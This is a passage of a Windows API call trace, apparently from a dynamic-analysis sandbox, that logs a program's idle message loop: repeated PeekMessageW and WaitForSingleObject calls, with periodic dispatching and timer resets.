PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.473] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.485] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.485] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.500] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.500] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.516] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.516] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.532] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.532] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.547] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.547] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.563] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.563] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.578] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.578] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.594] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.594] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.609] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.610] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.625] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.625] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.641] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.641] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.656] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.656] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.672] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.672] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.691] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.691] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.703] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.703] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.719] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.719] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.736] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.736] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.750] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.750] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.765] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.765] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.781] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.781] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.797] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.797] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.812] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0136.812] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0136.812] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0136.812] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0136.812] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0136.813] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.813] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.828] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.828] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.844] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.844] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.859] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.859] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.875] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.875] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.890] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.890] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.906] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.906] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.921] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.922] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.937] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.937] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.953] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.953] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.968] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.969] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.984] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.984] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.000] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.000] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.015] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.015] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.031] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.031] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.046] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.046] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.062] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.062] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.078] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.078] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.093] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.093] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.109] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.109] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.124] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.124] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.140] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.140] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.156] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.156] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.171] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.171] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.188] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.188] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.202] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.202] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.218] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.218] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.234] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.234] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.249] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.249] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.265] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.265] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.280] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.280] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.296] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.296] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.311] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.312] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.327] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.327] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.343] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.343] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.358] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.358] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.374] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.374] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.390] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.390] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.405] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.405] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.429] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.429] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.436] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.436] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.453] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.453] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.468] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.468] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.483] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.483] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.499] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.499] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.515] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.515] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.530] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.530] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.546] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.546] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.561] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.561] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.577] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0137.577] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0137.577] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0137.577] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0137.577] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0137.577] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.577] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.593] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.593] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.608] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.608] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.624] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.624] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.639] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.639] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.656] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.657] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.670] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.670] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.698] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.698] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.702] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.702] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.717] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.717] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.733] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.733] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.748] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.748] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.764] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.764] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.780] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.780] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.796] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.796] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.812] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.812] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.827] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.827] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.843] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.843] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.858] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.858] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.873] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.873] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.889] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.889] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.904] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.904] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.920] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.920] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.936] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.936] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.951] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.951] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0137.967] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0137.967] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 